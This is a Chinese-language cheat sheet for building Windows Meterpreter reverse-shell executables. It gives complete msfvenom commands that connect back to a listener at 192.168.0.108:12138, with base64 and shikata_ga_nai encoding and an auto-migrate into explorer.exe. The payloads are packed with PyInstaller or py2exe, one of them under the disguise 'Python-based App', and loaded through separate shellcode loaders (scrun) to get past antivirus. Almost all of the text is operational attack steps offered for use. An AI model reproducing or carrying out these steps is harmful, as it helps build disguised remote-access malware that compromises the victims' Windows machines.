Base64编码+Pyinstaller打包

MSF监听需设置自动迁移进程

set autorunscript migrate -n explorer.exe
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c

Shellcode粘贴在shellcode+base64+c.py中

python pyinstaller-script.py -F -w shellcode.py

会在目录下生成dist文件夹，exe文件就在里面

pyinstaller加载C代码编译

生成C格式payload MSF监听需设置自动迁移进程

set autorunscript migrate -n explorer.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c

粘贴shellcode到shellcode+c.py中，在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe

python pyinstaller-script.py -F -w shellcode.py

会在目录下生成dist文件夹，exe文件就在里面

pyinstaller加载py代码编译

生成py格式payload MSF监听需设置自动迁移进程

set autorunscript migrate -n explorer.exe
msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py

粘贴shellcode到shellcode+py.py中，在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe

python pyinstaller-script.py --console --onefile shellcode.py

会在目录下生成dist文件夹，exe文件就在里面

Py2exe打包exe

生成raw格式payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py
在32位系统上安装python、py2exe
创建setup.py放置同一目录

from distutils.core import setup
import py2exe
setup(
name = "Meter",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
执行打包命令
>python setup.py py2exe
会在当前目录生成dist文件夹，打包好的exe在里面

加载器分离

hex

生成c格式payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c

下载k8final

粘贴shellcode进去

使用

https://github.com/k8gege/scrun

或
>python scrun.py xxx
或
编译ScRunHex.py为exe

Base64( *)

生成c格式payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
下载k8final

粘贴shellcode进去

进行hex编码后，粘贴进去base64编码

看系统位数编译ScRunBase.py文件，使用pyinstaller打包为exe后执行

https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py
>python pyinstaller-script.py -F -w ScRunBase64.py